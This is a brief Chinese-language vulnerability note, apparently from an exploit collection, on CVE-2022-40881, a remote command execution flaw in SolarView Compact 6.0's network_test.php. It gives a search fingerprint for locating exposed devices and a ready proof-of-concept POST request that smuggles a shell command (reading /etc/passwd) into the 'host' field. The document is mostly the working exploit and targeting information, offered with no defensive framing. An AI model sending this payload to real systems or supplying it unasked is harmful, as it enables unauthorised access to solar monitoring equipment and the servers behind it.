# SolarView network_test.php 远程命令执行漏洞 CVE-2022-40881

# 漏洞描述

SolarView network_test.php 存在远程命令执行漏洞，攻击者通过构造特殊的请求，可以获取服务器权限

SolarView Compact 6.0

body="SolarView Compact" && title=="Top"

主页面

验证POC

POST /network_test.php
  
host=%0acat${IFS}/etc/passwd%0a&command=ping

1
2
3